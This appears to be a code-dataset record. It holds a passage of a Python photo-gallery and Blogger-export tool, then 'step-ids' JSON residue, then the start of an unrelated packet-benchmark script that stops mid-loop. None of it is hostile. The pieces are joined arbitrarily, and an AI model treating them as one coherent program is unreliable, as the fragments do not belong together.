offsety = [1]\n for h in height[:-1]:\n offsety.append(offsety[-1] + h + 2)\n\n return widthnum, heightnum, width, height, offsetx, offsety\n\n\ndef list_of_htmlfiles(args, posts):\n htmlist = list()\n htmlist.append(os.path.join(args.dest, args.rootname))\n for post in posts:\n htmlist.extend(list_of_htmlfiles_in_items(post.dcim))\n return htmlist\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(f'{len(html_to_remove)} html files to remove. Continue [y|n]? ').lower()\n if inpt == 'n':\n return\n\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? ').lower()\n if inpt == 'n':\n return\n\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\n# -- List of medias helpers ---------------------------------------------------\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n\n if not filelist:\n return filelist\n\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n\n return sorted(filelist, key=keyfunc)\n\n\ndef list_of_files(sourcedir, recursive):\n \"\"\"\n Return the list of full paths for files in source directory\n \"\"\"\n result = list()\n if recursive is False:\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n result.append(os.path.join(sourcedir, basename))\n else:\n for root, dirs, files in os.walk(sourcedir):\n if '.nomedia' not in files:\n for basename in sorted_listdir(files):\n result.append(os.path.join(root, basename))\n return result\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\ndef list_of_medias_ext(args, sourcedir):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n plus subdirectories containing media\n \"\"\"\n result = list()\n listdir = sorted_listdir(os.listdir(sourcedir))\n if '.nomedia' not in listdir:\n for basename in listdir:\n fullname = os.path.join(sourcedir, basename)\n if os.path.isdir(fullname) and basename != '$RECYCLE.BIN' and contains_media(args, fullname):\n result.append(fullname)\n else:\n if is_media_within_dates(fullname, args.dates):\n result.append(fullname)\n return result\n\n\ndef contains_media(args, dirname):\n for root, dirs, files in os.walk(dirname):\n if '.nomedia' not in files:\n for basename in files:\n if is_media_within_dates(os.path.join(root, basename), args.dates):\n return True\n else:\n return False\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\n# -- Creation of gallery element ----------------------------------------------\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),\n thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n # corrupted image\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname, thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),\n thumbsize, infofmt)\n except CalledProcessError:\n # corrupted video\n warning('Unable to read video', media_fullname)\n return None\n\n\ndef create_item_subdir(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n\n info, infofmt = None, None\n thumbsize = (thumbmax, int(round(thumbmax / 640 * 480)))\n\n medias_ext = list_of_medias_ext(args, media_fullname)\n if not medias_ext:\n return None\n\n item = PostSubdir(None, media_fullname, '/'.join((args.thumbrep, thumb_basename)),\n thumbsize, infofmt)\n item.htmname = os.path.join(os.path.dirname(thumbdir), media_relname + args.html_suffix)\n if args.thumbnails.subdir_caption:\n item.caption = media_basename\n else:\n item.caption = ''\n\n _, posts = make_posts(args, media_fullname)\n item.posts = posts\n items = [item for post in posts for item in post.dcim]\n item.sublist = items\n\n make_thumbnail_subdir(args, media_fullname, thumb_fullname, thumbsize, items, thumbdir)\n return item\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n# -- Creation of posts --------------------------------------------------------\n\n\ndef make_posts(args, dirname):\n if args.diary is True:\n if not args.sourcedir:\n return make_posts_from_diary(args)\n else:\n return make_posts_from_diary_and_dir(args)\n elif args.bydate is False:\n return make_posts_from_subdir(args, dirname)\n else:\n return make_posts_from_subdir_and_date(args, dirname)\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n\n return title, posts\n\n\ndef create_items_by_date(args, medias, posts):\n # list of required dates\n if args.dates == 'diary':\n required_dates = {post.date for post in posts}\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <= date <= date2}\n\n bydate = defaultdict(list)\n for media_fullname in medias:\n date = date_from_item(media_fullname)\n if date in required_dates:\n item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)\n if item:\n bydate[date].append(item)\n\n for date, liste in bydate.items():\n liste.sort(key=lambda item: time_from_item(item.uri))\n\n return bydate\n\n\ndef make_posts_from_diary_and_dir(args):\n title, posts = make_posts_from_diary(args)\n\n # list of all pictures and movies\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n\n bydate = create_items_by_date(args, medias, posts)\n\n # make list of extra dates (not in posts)\n extradates = set(bydate) - {post.date for post in posts}\n\n # complete posts with extra dates\n for date in extradates:\n post = Post.from_date(date)\n post.extra = True\n bisect.insort(posts, post)\n\n # several posts can have the same date, only the first one is completed with dcim medias\n for post in posts:\n if post.date in bydate and post.daterank == 1:\n post.dcim = bydate[post.date]\n\n return title, posts\n\n\ndef make_posts_from_subdir(args, dirname):\n # list of pictures and movies plus subdirectories\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n\n #required_dates = get_required_dates(args, medias_ext, posts=None)\n #medias_ext_bis = []\n #for media in medias_ext:\n # if complies_with_required_dates(media):\n # medias_ext_bis.append(media)\n\n # complete posts\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir, 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]\n\n return title, posts\n\n\ndef make_posts_from_subdir_and_date(args, dirname):\n # list of all pictures and movies\n if args.bydir is False:\n medias = list_of_medias(args, dirname, args.recursive)\n subdirs = []\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n medias = [_ for _ in medias_ext if is_media(_)]\n subdirs = [_ for _ in medias_ext if not is_media(_)]\n\n # create list of posts with a single post containing all subdirs\n posts = list()\n items = list()\n for media_fullname in subdirs:\n item = create_item(args, media_fullname, args.sourcedir, args.thumbdir, 'dcim', 300)\n if item:\n items.append(item)\n if items:\n post = Post(date='00000000', text='', medias=[])\n post.dcim = items\n posts.append(post)\n\n bydate = create_items_by_date(args, medias, posts)\n\n # add dates\n for date in sorted(bydate):\n post = Post.from_date(date)\n post.dcim = bydate[post.date]\n posts.append(post)\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.sourcedir)[0]\n\n return title, posts\n\n\n# -- Creation of html page from directory tree --------------------------------\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname), 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\n# -- Creation of diary from medias --------------------------------------------\n\n\ndef create_diary(args):\n # list of all pictures and movies\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n\n # list of required dates\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <= date <= date2}\n\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\n# -- Export to blogger---------------------------------------------------------\n\n\ndef online_images_url(args):\n try:\n if args.urlblogger.startswith('http:') or args.urlblogger.startswith('https:'):\n with urlopen(args.urlblogger) as u:\n buffer = u.read()\n else:\n with open(args.urlblogger, 'rb') as f:\n buffer = f.read()\n except:\n error('Unable to read url', args.urlblogger)\n buffer = buffer.decode('utf-8')\n\n online_images = dict()\n for match in re.finditer('<div class=\"separator\"((?!<div).)*?</div>', buffer, flags=re.DOTALL):\n div_separator = match.group(0)\n div_separator = div_separator.replace(' ', '')\n elem_div = objectify.fromstring(div_separator)\n for elem_a in elem_div.iterchildren(tag='a'):\n href = elem_a.get(\"href\")\n thumb = elem_a.img.get(\"src\")\n online_images[os.path.basename(href)] = (href, thumb)\n\n # video insertion relies only on video order\n online_videos = list()\n for match in re.finditer('<iframe allowfullscreen=\"allowfullscreen\".*?</iframe>', buffer, flags=re.DOTALL):\n iframe = match.group(0)\n online_videos.append(iframe)\n\n return online_images, online_videos\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n else:\n if 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n # no check for the moment\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\ndef compose_blogger_html(args, title, posts, imgdata, online_videos):\n \"\"\" Compose html with blogger image urls\n \"\"\"\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.uri not in imgdata:\n print('Image missing: ', media.uri)\n else:\n img_url, resized_url = imgdata[media.uri]\n media.uri = img_url\n media.resized_url = resized_url\n elif type(media) is PostVideo:\n if not online_videos:\n print('Video missing: ', media.uri)\n else:\n media.iframe = online_videos[0]\n del online_videos[0]\n else:\n assert False\n\n return print_html(args, posts, title, '', target='blogger')\n\n\ndef prepare_for_blogger(args):\n \"\"\"\n Export blogger html to clipboard.\n If --full, export complete html, otherwise export html extract ready to\n paste into blogger edit mode.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n online_images, online_videos = online_images_url(args)\n\n if args.check_images and check_images(args, posts, online_images) is False:\n pass\n\n html = compose_blogger_html(args, title, posts, online_images, online_videos)\n\n if args.full is False:\n html = re.search('<body>(.*)?</body>', html, flags=re.DOTALL).group(1)\n html = re.sub('<script>.*?</script>', '', html, flags=re.DOTALL)\n html = STYLE.replace('%%', '%') + html\n\n if args.dest:\n with open(args.dest, 'wt', encoding='utf-8') as f:\n f.write(html)\n else:\n clipboard.copy(html)\n\n\n# -- Other commands -----------------------------------------------------------\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n# -- Configuration file ------------------------------------------------------\n\n\n# The following docstring is used to create the configuration file.\nCONFIG_DEFAULTS = \"\"\"\\\n[source]\n\n; source directory\n; value: valid path\nsourcedir = .\n\n; one web page per directory\n; value: true or false\nbydir = false\n\n; dispatch medias by dates\n; value: true or false\nbydate = false\n\n; include text and medias from diary file\n; value: true or false\ndiary = false\n\n; include subdirectories recursively (used when bydir is false)\n; value: true or false\nrecursive = false\n\n; interval of dates to include\n; value: source|diary|yyyymmdd-yyyymmdd or empty (= source)\ndates =\n\n; github Pages compatibility (.htlml extension and no dot in directory names)\n; value: true or false\ngithub_pages = false\n\n[thumbnails]\n\n; specifies whether or not the gallery displays media description (size, dimension, etc)\n; value: true or false\nmedia_description = true\n\n; specifies whether subdir captions are empty or the name of the subdir\n; value: true or false\nsubdir_caption = true\n\n; timestamp of thumbnail in video\n; value: number of seconds\nthumbdelay = 5\n\n; maximum number of thumbnails to remove without user confirmation\n; value: integer\nthreshold_thumbs = 10\n\n[photobox]\n\n; Allows to navigate between first and last images\n; value: true or false\nloop = false\n\n; Show gallery thumbnails below the presented photo\n; value: true or false\nthumbs = true\n\n; Should autoplay on first time or not\n; value: true or false\nautoplay = false\n\n; Autoplay interval (less than 1000 will hide the autoplay button)\n; value: milliseconds\ntime = 3000\n\n; Disable/enable mousewheel image zooming\n; value: true or false\nzoomable = true\n\n; Allow rotation of the image\n; value: true or false\nrotatable = true\n\n; Change image using mousewheel left/right\n; value: true or false\nwheelNextPrev = true\n\"\"\"\n\n\nclass MyConfigParser (ConfigParser):\n \"\"\"Add input checking.\"\"\"\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry))\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\ndef getconfig(options, config_filename):\n class Section:\n pass\n\n options.source = Section()\n options.thumbnails = Section()\n options.photobox = Section()\n\n config = MyConfigParser()\n config.read(config_filename)\n\n # [source]\n options.source.sourcedir = config.get('source', 'sourcedir')\n options.source.bydir = config.getboolean('source', 'bydir')\n options.source.bydate = config.getboolean('source', 'bydate')\n options.source.diary = config.getboolean('source', 'diary')\n options.source.recursive = config.getboolean('source', 'recursive')\n options.source.dates = config.get('source', 'dates')\n options.source.github_pages = config.getboolean('source', 'github_pages', default=False)\n\n # [thumbnails]\n options.thumbnails.media_description = config.getboolean('thumbnails', 'media_description')\n options.thumbnails.subdir_caption = config.getboolean('thumbnails', 'subdir_caption')\n options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')\n options.thumbnails.threshold_thumbs = config.getint('thumbnails', 'threshold_thumbs')\n options.thumbnails.threshold_htmlfiles = config.getint('thumbnails', 'threshold_htmlfiles', default=3)\n\n # [photobox]\n options.photobox.loop = config.getboolean('photobox', 'loop')\n options.photobox.thumbs = config.getboolean('photobox', 'thumbs')\n options.photobox.autoplay = config.getboolean('photobox', 'autoplay')\n options.photobox.time = config.getint('photobox', 'time')\n options.photobox.zoomable = config.getboolean('photobox', 'zoomable')\n options.photobox.rotatable = config.getboolean('photobox', 'rotatable')\n options.photobox.wheelNextPrev = config.getboolean('photobox', 'wheelNextPrev')\n\n\ndef setconfig(cfgname, section, key, value):\n config = MyConfigParser()\n config.read(cfgname)\n config.set(section, key, value)\n with open(cfgname, 'wt') as configfile:\n config.write(configfile)\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n # update only entries which can be modified from the command line (source section)\n updates = (\n ('sourcedir', args.sourcedir),\n ('bydir', BOOL[args.bydir]),\n ('bydate', BOOL[args.bydate]),\n ('diary', BOOL[args.diary]),\n ('recursive', BOOL[args.recursive]),\n ('dates', args.dates),\n ('github_pages', BOOL[args.github_pages]),\n )\n\n # manual update to keep comments\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\n# -- Error handling -----------------------------------------------------------\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT +\n ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n# Every error message error must be declared here to give a return code to the error\nERRORS = '''\\\nFile not found\nDirectory not found\nNo date in post\nIncorrect date value:\nPosts are not ordered\nUnable to read url\nNo image source (--sourcedir)\nNo blogger url (--url)\nMissing or incorrect config value:\nError creating configuration file\nError reading configuration file.\nIncorrect date format\nIncorrect parameters:\n'''\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT +\n ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n# -- Main ---------------------------------------------------------------------\n\n\nBOOL = ('false', 'true')\n\n\ndef parse_command_line(argstring):\n parser = argparse.ArgumentParser(description=None, usage=USAGE)\n\n agroup = parser.add_argument_group('Commands')\n xgroup = agroup.add_mutually_exclusive_group()\n xgroup.add_argument('--gallery', help='source in --sourcedir',\n action='store', metavar='<root-dir>')\n agroup.add_argument('--update', help='updates gallery with parameters in config file',\n action='store', metavar='<root-dir>')\n xgroup.add_argument('--create', help='create journal from medias in --sourcedir',\n action='store', metavar='<root-dir>')\n # testing\n xgroup.add_argument('--resetcfg', help='reset config file to defaults',\n action='store', metavar='<root-dir>')\n xgroup.add_argument('--setcfg', help=argparse.SUPPRESS,\n action='store', nargs=4, metavar='<root-dir>')\n xgroup.add_argument('--idem', help=argparse.SUPPRESS,\n action='store', metavar='<root-dir>')\n # blogger\n xgroup.add_argument('--blogger',\n help='input md, html blogger ready in clipboard',\n action='store', metavar='<root-dir>')\n\n agroup = parser.add_argument_group('Parameters')\n agroup.add_argument('--bydir', help='organize gallery by subdirectory',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--bydate', help='organize gallery by date',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--diary', help='organize gallery using markdown file diary',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--recursive', help='--sourcedir scans recursively',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dates', help='dates interval',\n action='store', default=None)\n agroup.add_argument('--sourcedir', help='media directory',\n action='store', default=None)\n agroup.add_argument('--github_pages', help='github Pages compatibility',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dest', help='output directory',\n action='store')\n agroup.add_argument('--forcethumb', help='force calculation of thumbnails',\n action='store_true', default=False)\n\n agroup.add_argument('--full', help='full html (versus blogger ready html)',\n action='store_true', default=False)\n agroup.add_argument('--check', dest='check_images', help='check availability of medias on blogger',\n action='store_true')\n agroup.add_argument('--url', dest='urlblogger', help='blogger post url',\n action='store')\n\n if argstring is None:\n print('Type \"galerie -h\" for help')\n sys.exit(1)\n else:\n args = parser.parse_args(argstring.split())\n\n if args.update and (args.bydir or args.bydate or args.diary or args.sourcedir or\n args.recursive or args.dates or args.github_pages):\n error('Incorrect parameters:',\n '--update cannot be used with creation parameters, use explicit command')\n\n args.bydir = args.bydir == 'true'\n args.bydate = args.bydate == 'true'\n args.diary = args.diary == 'true'\n args.recursive = args.recursive == 'true'\n args.dates = 'source' if (args.dates is None) else args.dates\n args.github_pages = args.github_pages == 'true'\n\n args.root = (\n args.create or args.gallery or args.update\n or args.blogger or args.idem or args.resetcfg\n )\n\n if args.setcfg:\n args.root = args.setcfg[0]\n args.setcfg = args.setcfg[1:]\n\n return args\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n else:\n if args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n\n if args.dest is None:\n args.dest = args.root\n\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n\n if args.gallery or args.update:\n # check for ffmpeg and ffprobe in path\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n\n if args.dates:\n if not(args.gallery or args.create):\n # silently ignored for the moment, otherwise all other commands will\n # launch a wanrning or an error on the default --dates value\n pass\n\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match(r'\\d+-\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n\n elif args.create:\n create_diary(args)\n\n elif args.blogger:\n prepare_for_blogger(args)\n\n elif args.idem:\n idempotence(args)\n\n elif args.setcfg:\n setconfig_cmd(args)\n\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\nif __name__ == '__main__':\n main(' '.join(sys.argv[1:]))\n",
"step-ids": [
79,
84,
88,
100,
110
]
}
|
[
79,
84,
88,
100,
110
] |
#! /usr/bin/python
import math
import sys
import os
import subprocess
#PTYPES = [ "eth_ip_udp_head_t", "ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
#PTYPES = [ "eth_ip_udp_head_t", "eth_32ip_udp_head_t", "eth_64ip_udp_head_t", "eth64_64ip64_64udp_head_t", "eth6464_64ip64_64udp_head_t" ]
PTYPE = "volatile eth_ip_udp_head_t"
#PTYPE = "volatile eth6464_64ip64_64udp_head_t"
def log_out(out):
print(out[:-1])
def run_proc(p, wait):
if not wait:
pid = os.fork()
if pid != 0:
return
proc = subprocess.Popen(p, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc.wait()
log_out("STDERR -- %s\n" % p)
for line in proc.stderr:
log_out(line)
log_out("STDOUT -- %s\n" % p)
for line in proc.stdout:
log_out(line)
if not wait:
sys.exit(0)
args = []
for i in [1,10] + \
range(100,1000,200) + \
range(1000,10 *1000, 1000) + \
range(10 * 1000,100 * 1000, 20 * 1000) + \
range(100 * 1000, 1000 * 1000, 200 * 1000) + \
range(1000 * 1000, 5 * 1000 * 1000, 2000 * 1000):
packet_count = i
